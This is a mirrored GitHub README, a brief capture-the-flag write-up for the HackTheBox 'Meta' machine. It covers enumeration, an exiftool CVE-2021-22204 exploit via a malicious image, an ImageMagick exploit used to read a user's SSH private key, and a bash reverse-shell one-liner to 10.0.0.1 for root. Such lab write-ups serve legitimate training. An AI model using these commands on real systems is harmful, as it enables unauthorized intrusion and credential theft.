GithubHelp home page GithubHelp logo

htb-meta's Introduction

HTB META

Initial Scans:

nmap -sV -sC

image

Directory Enumeration

No directories found using: gobuster dir --url artcorp.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 25 > gobuster_dir.txt

Sub-Domain Enum

Used dns proxy

https://github.com/hubdotcom/marlon-tools/blob/master/tools/dnsproxy/dnsproxy.py

Found dev01 subdmain using:

gobuster dns -t 30 -w /usr/share/wordlists/subdomains-top1million-110000.txt -d artcorp.htb

image

Exploit time

looks like service may be running exiftool to get the metadata

Server is Devian + php

May contain CVE-2021-22204-exiftool

Used this tool to create malicious jpg

https://github.com/convisolabs/CVE-2021-22204-exiftool

now we have access to the machine as www-data user

image

Privilege Escalation

we need to be thomas user in order to read user flag

lets scan the system process to check for any vulnerable services

https://github.com/DominicBreuker/pspy

using pspy (unprivileged Linux process snooping)

upload to uploads folder and execute

image image

some of these proceses may be vulnerable

image

lets check mogrify

$ mogrify --version Version: ImageMagick 7.0.10-36 Q16 x86_64 2021-08-29

vulnerable version

https://www.exploit-db.com/exploits/39767

uploaded a malicious svg file wich exploits te vulneravility

image

image

now lets get ssh keys using this vuln so that we can ssh as thomas

cat ~/.ssh/id_rsa

image

Lets use this key to login as thomas

image

PE II

####now we get root user

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

image image

htb-meta's People

Contributors

polgs avatar

Watchers

avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.